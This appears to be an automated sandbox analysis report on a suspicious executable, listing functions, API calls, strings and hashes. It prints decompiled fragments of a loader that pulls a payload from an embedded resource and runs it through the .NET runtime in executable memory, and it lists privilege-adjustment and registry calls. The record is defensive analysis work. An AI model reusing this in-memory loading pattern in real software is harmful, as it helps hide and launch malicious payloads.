Instruction ID: 09743b080705dff399da2963ffc7a3fd0ebc8b57c846af8919ed85c6265dca00
Opcode Fuzzy Hash: ea3f20c07ca560f71a1bdf4c7ea599637d32e7ede2cf09a9c7255d56f4684bc8
Instruction Fuzzy Hash: 38410972A40249BADF20DAA4CC55FEF77FDDF49710F4104AAF900F7290D67199448B65

Uniqueness

Uniqueness Score: -1.00%

Function 00B240B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00B24132

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00B24124
, $, xrefs: 00B24172

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 9e599488e136e66dc5febced2e988ba9adb5532d02ac4cf49335bae26415296c
Instruction ID: 601884058a2f6d3d15d4bb226fd4082750404158c0efafa8c0b5a68a66c471a8
Opcode Fuzzy Hash: 9e599488e136e66dc5febced2e988ba9adb5532d02ac4cf49335bae26415296c
Instruction Fuzzy Hash: 9721B431A00228ABCF10EFA4D991FAD7BF8EF54341F000498F909B7282DB74E955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B099BD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Part of subcall function 00B0B79A: GetClassNameW.USER32 ref: 00B0B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B09A2B

Strings

ListBox, xrefs: 00B099F5
ComboBox, xrefs: 00B099CA

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d086beb292508d898bd299965be4eeefc5735b43f507161071167445ca385226
Instruction ID: 4b60bcc0c06cf0090253393d10e918e93a19522140336696b3c20a02cdff3d92
Opcode Fuzzy Hash: d086beb292508d898bd299965be4eeefc5735b43f507161071167445ca385226
Instruction Fuzzy Hash: 52012871B42114ABCF14EBA4CC91DFE77A9FF52360B000659F872532D2DF305C088650

Uniqueness

Uniqueness Score: -1.00%

Function 00B1934C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B19367
__fread_nolock.LIBCMT ref: 00B1937C

Strings

EA06, xrefs: 00B193AE

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: e1b6a77efdc2ef8614e1f9e111f852375273737045dd8336bc1ebc9520e515b9
Instruction ID: f053e60348dfaf929a67d8bcbd6361c856aca7c697cf7ece941f68a3d87a681c
Opcode Fuzzy Hash: e1b6a77efdc2ef8614e1f9e111f852375273737045dd8336bc1ebc9520e515b9
Instruction Fuzzy Hash: C801B972D042587EDB18C6A8C856EFEBBF8DB15301F00429FF553D2281E575A6049B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B098B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Part of subcall function 00B0B79A: GetClassNameW.USER32 ref: 00B0B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B09923

Strings

ListBox, xrefs: 00B098ED
ComboBox, xrefs: 00B098C2

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 61b759b4c85c084cc56197fb2f40df942be6281162a8334744d0667bdfb25916
Instruction ID: 93578aac7f9ebbcf36676e2e58b92ef186d99eaf8639724390c86af29c74f67d
Opcode Fuzzy Hash: 61b759b4c85c084cc56197fb2f40df942be6281162a8334744d0667bdfb25916
Instruction Fuzzy Hash: 3301A776B421046BCB14EBA4C952EFF77E8DF56340F10015DB852632D2DE249E0896B1

Uniqueness

Uniqueness Score: -1.00%

Function 00B0993A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Part of subcall function 00B0B79A: GetClassNameW.USER32 ref: 00B0B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B099A6

Strings

ListBox, xrefs: 00B09972
ComboBox, xrefs: 00B09947

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 80214789f6195610609f83bf64659d7046cab544a4699f70aaf0ea48cccffa5a
Instruction ID: eba617cbec1dffd34fafd8fff9901a895b0831d9d759ab6a0f7081a0e8025a75
Opcode Fuzzy Hash: 80214789f6195610609f83bf64659d7046cab544a4699f70aaf0ea48cccffa5a
Instruction Fuzzy Hash: EF01A772A46104A6CB10EBA4CA52FFE77EC9F12340F510059B846B32D2DE259E089671

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tpiyon2.exe PID: 7028 Parent PID: 6996 tpiyon2.exeCOMMON

Executed Functions

Function 00493EA0, Relevance: 25.3, APIs: 1, Strings: 13, Instructions: 829libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 004945F5

Strings

X1ar, xrefs: 004947FA
X1ar, xrefs: 00494022
X1ar, xrefs: 004946D9
X1ar, xrefs: 00493F7E
X1ar, xrefs: 004946AF
X1ar, xrefs: 004944E1
X1ar, xrefs: 00493FB6
X1ar, xrefs: 004944C2
X1ar, xrefs: 00494748
81E, xrefs: 00493FF8
X1ar, xrefs: 00494518
X1ar, xrefs: 0049453E
X1ar, xrefs: 00494777

Memory Dump Source

Source File: 00000002.00000002.582926458.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: 81E$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar
API String ID: 2994545307-682645622
Opcode ID: 214ef06f3f73c8d0a3048149e04fb8b2231d547f79ebd710eaeb92a39332cb92
Instruction ID: d9776489da2c2c2d9150cdbdea086fffcc847b344a580ff97934f668dfab7ab3
Opcode Fuzzy Hash: 214ef06f3f73c8d0a3048149e04fb8b2231d547f79ebd710eaeb92a39332cb92
Instruction Fuzzy Hash: 66624F35A00619CFDF15DFA4C944BDEBBF2AF89300F1485AAE909AB261DB719D46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00498408, Relevance: 1.8, APIs: 1, Instructions: 338libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 004985D0

Memory Dump Source

Source File: 00000002.00000002.582926458.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8aceeccf335cd7348282fffd88668d7d1d71eabde4ed516c16982a236be42a99
Instruction ID: b16a4ad95e8fcab1d46cd7561387bfaecfedb0486563f486f6b62aead866e616
Opcode Fuzzy Hash: 8aceeccf335cd7348282fffd88668d7d1d71eabde4ed516c16982a236be42a99
Instruction Fuzzy Hash: 74C18B34A042458FDB05EBB8D854BAE7FE2AF85304F1585BAD405EB391DB38DC46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AF83, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00A7B003

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: abc73b6c5d831aad1349e5a45d62220d37b34f4caeded28c3f683f4d6195f199
Instruction ID: bf7c22ac4c22fe71eeccd1dad5b5d20b5e4f4869e3bbff5d42cfec79e35d40d1
Opcode Fuzzy Hash: abc73b6c5d831aad1349e5a45d62220d37b34f4caeded28c3f683f4d6195f199
Instruction Fuzzy Hash: 8A21BFB6509380AFDB228F25DC44B52BFB4AF16310F08C5DAE9898B163D275D908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B105, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 00A7B171

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 2c5d5bbe5f62f29af1c54f6fdc6259e950605500836bad82b3df2f234348ea28
Instruction ID: abad3fe4cc0e0caa34778e668bf14e7bce2a955d5b973198fea38b6e2890fb65
Opcode Fuzzy Hash: 2c5d5bbe5f62f29af1c54f6fdc6259e950605500836bad82b3df2f234348ea28
Instruction Fuzzy Hash: D8118E724097C0AFDB228F15DC45A52FFB4EF16314F09C4DAE9888B163D275A908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AFBA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00A7B003

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 24a8ca4f9be98188211064fb9170effacd177c8aeb43ff019b9a5de2e70a780a
Instruction ID: 835fe31a8fbca3d8b5d73edba85645d5e78d17b5b1250eac8b6ba7b38fc2a2cb
Opcode Fuzzy Hash: 24a8ca4f9be98188211064fb9170effacd177c8aeb43ff019b9a5de2e70a780a
Instruction Fuzzy Hash: DD119EB15007049FDB208F55DC44B56FBE4EF04320F08C4AAEE498B652D775E808DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B136, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 00A7B171

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: a84fc6b6d8405050d140bada2984be12e1913aa06a940edeb83de8bdf79a7ad7
Instruction ID: 091c40b03246323fba05c3b389e7b834a156d75c7ca4487cf2e3fe7bbcb60b18
Opcode Fuzzy Hash: a84fc6b6d8405050d140bada2984be12e1913aa06a940edeb83de8bdf79a7ad7
Instruction Fuzzy Hash: B2018B71500644DFDB208F15DC89B26FFA0EF04720F18C59ADE494B212D3B6A418DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A72477, Relevance: .9, Instructions: 911COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.583328120.0000000000A72000.00000040.00000001.sdmp, Offset: 00A72000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd83201509cc919b6cfffc90f0051fa6464653b24fa38375af0ae040a69843ff
Instruction ID: c7491689363491960f10b18804ea7804f4f3b920b0d071b7115a251da6b931a0
Opcode Fuzzy Hash: cd83201509cc919b6cfffc90f0051fa6464653b24fa38375af0ae040a69843ff
Instruction Fuzzy Hash: 86527C9290E3C19FDB174B365C68295BF729E6330171EC5CBC4C98F0A3E12A494AD76B

Uniqueness

Uniqueness Score: -1.00%

Function 00400116, Relevance: 27.0, APIs: 13, Strings: 1, Instructions: 2529memoryCOMMON

Download Yara Rule

APIs

CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00401127
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 0040113F
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00401161
GetCommandLineW.KERNEL32(?), ref: 004011FA
CommandLineToArgvW.SHELL32(00000000), ref: 00401201
SafeArrayCreateVector.OLEAUT32(00000008,00000000,?), ref: 00401210
SysAllocString.OLEAUT32(?), ref: 00401232
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 0040123E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 0040125B
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 0040127C
SafeArrayDestroy.OLEAUT32(?), ref: 004012C4
SafeArrayDestroy.OLEAUT32(00000000), ref: 004012CF
SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00401320
CoInitialize.OLE32(00000000), ref: 00401330
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00401350
VariantInit.OLEAUT32(?), ref: 0040141B
VariantInit.OLEAUT32(?), ref: 00401424
VariantClear.OLEAUT32(?), ref: 00401446
VariantClear.OLEAUT32(?), ref: 00401458
VariantClear.OLEAUT32(?), ref: 00401461
GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ArraySafe$CreateResourceVariant$ClearHandleModule$AllocCommandDataDestroyElementInitLineVector$AccessArgvExitFindFreeInitializeInstanceLoadLockProcessSizeofStringUnaccessVirtual
String ID: v2.0.50727
API String ID: 3516860096-2350909873
Opcode ID: 40c6017ee6451dee550824c7eecaae126f1fa6d2bfa1f811e93cf4152391767f
Instruction ID: 4570efe151b48d435ec6d70ab8cc44e90b16a3cc068f568d918fe4fe0475e423
Opcode Fuzzy Hash: 40c6017ee6451dee550824c7eecaae126f1fa6d2bfa1f811e93cf4152391767f
Instruction Fuzzy Hash: B2025E759093859FCB03CBA4C894999BFB5AF4B300B1941EBE485EB2A3D7399C05CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v2.0.50727
API String ID: 2372384083-2350909873
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A90D, Relevance: 1.6, APIs: 1, Instructions: 122registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A7AA05

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8563cc470ec548b9bcdda5f965251f23db76b1f07dc7aeb109bd592e90f3cc40
Instruction ID: b4182a8df6ef646e187ea94ddf849c311798b2acea7f5c3a383fa9c38260f3c1
Opcode Fuzzy Hash: 8563cc470ec548b9bcdda5f965251f23db76b1f07dc7aeb109bd592e90f3cc40
Instruction Fuzzy Hash: 71412B7140D3C46FE7138B258C55B56BFB8AF07210F0985DBE984CF1A3D2699849C772

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B4E0, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E80,05F234C5,00000000,00000000,00000000,00000000), ref: 00A7B57A

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: d46f46658d417b7b06206f5a7318e88e1b70ce7320bbb9a78c3bf563d51cf577
Instruction ID: a4607e22a8cf0901749e0bf3054fa3115093dbee7834d24fa14d9653a7e1a519
Opcode Fuzzy Hash: d46f46658d417b7b06206f5a7318e88e1b70ce7320bbb9a78c3bf563d51cf577
Instruction Fuzzy Hash: D131D5B2109380AFE7128F24DC45F56BFB8EF46324F0884DBE989DB193D2259909C771

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AA4D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,05F234C5,00000000,00000000,00000000,00000000), ref: 00A7AB08

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b6cb147928cb8d40efb525c125e6ba8ae58e3da0ea85032fb7b4bb56664df5ec
Instruction ID: b47ea44cc4d989c8ce9600ca8f0f1b21711f7bbd703956f69f0d1b46578d1cf8
Opcode Fuzzy Hash: b6cb147928cb8d40efb525c125e6ba8ae58e3da0ea85032fb7b4bb56664df5ec
Instruction Fuzzy Hash: AD31B171109384AFE722CF21CC45F56BFA8EF56310F08849AE9898B252D264E849CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A47A, Relevance: 1.6, APIs: 1, Instructions: 88networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E80,?,?), ref: 00A7A522

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: e74c15f9f80bb63aad9be8fe9ef4fd8c6aa1255e7dd59ee0a7b06766821750ec
Instruction ID: 72101ae1d70f37ac2f406ce0fc5c1e9b7bf3a74a883d11af46b45ff3f13d01a2
Opcode Fuzzy Hash: e74c15f9f80bb63aad9be8fe9ef4fd8c6aa1255e7dd59ee0a7b06766821750ec
Instruction Fuzzy Hash: 6B31847240D3C06FD7138B618C55B65BFB4AF47610F0A81DBD984CF1A3D229A909D772

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B5D9, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E80,05F234C5,00000000,00000000,00000000,00000000), ref: 00A7B66A

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: add20253c1d09c17f1acf311d987eaae51de1efd6fb4a2e9824ea126772b6d98
Instruction ID: 70ce041de92623b688fed20ba24911336721ddf19cc5f679d5eac9f1ebaea95c
Opcode Fuzzy Hash: add20253c1d09c17f1acf311d987eaae51de1efd6fb4a2e9824ea126772b6d98
Instruction Fuzzy Hash: E02182B1505380AFE7128F25DC44F56BFA8EF42310F08C4ABE945DB252D264E908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B6D0, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 00A7B776

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 5e0ed9f62afba7dc6bb206b46f125522633862e10720f34f95459bb5cbb2878e
Instruction ID: 83c40ebcfdeb2541f6bef9d5380e6bb2a3795c9735106bc6d22f38e3ccc033ef
Opcode Fuzzy Hash: 5e0ed9f62afba7dc6bb206b46f125522633862e10720f34f95459bb5cbb2878e
Instruction Fuzzy Hash: A321A0715093C06FD3128B65CC55F66BFB4EF87610F0984DBE8848B1A3D624A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B340, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00A7B3DA

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1a8b717def7975566381abb351eae307253309661e6d8193fee46423eb68f436
Instruction ID: 3f2970a86a5d77e1eb3c62b7484f6b2729e66c0e85788bdbd89e001e6b7a0d29
Opcode Fuzzy Hash: 1a8b717def7975566381abb351eae307253309661e6d8193fee46423eb68f436
Instruction Fuzzy Hash: F62107755093C06FD3138B25DC51F62BFB4EF87A10F0A85CBE8848B693D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A986, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A7AA05

Memory Dump Source

Source File: 00000002.00000002.583346190.0000000000A7A000.00000040.00000001.sdmp, Offset: 00A7A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 78e430040c7614a4f2f402a553af7466b5f59aa6ef3ef2a5678d1e4ab1414265
Instruction ID: 4f360d7e8995e7729f0cd1fe53dc90884fae6610641e540cb5dbd7992f581915
Opcode Fuzzy Hash: 78e430040c7614a4f2f402a553af7466b5f59aa6ef3ef2a5678d1e4ab1414265
Instruction Fuzzy Hash: D9219FB2500304BFE7219B19DC85F6BFBACEF54710F14C55AEA459A241D664E8088B72

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AD6B, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

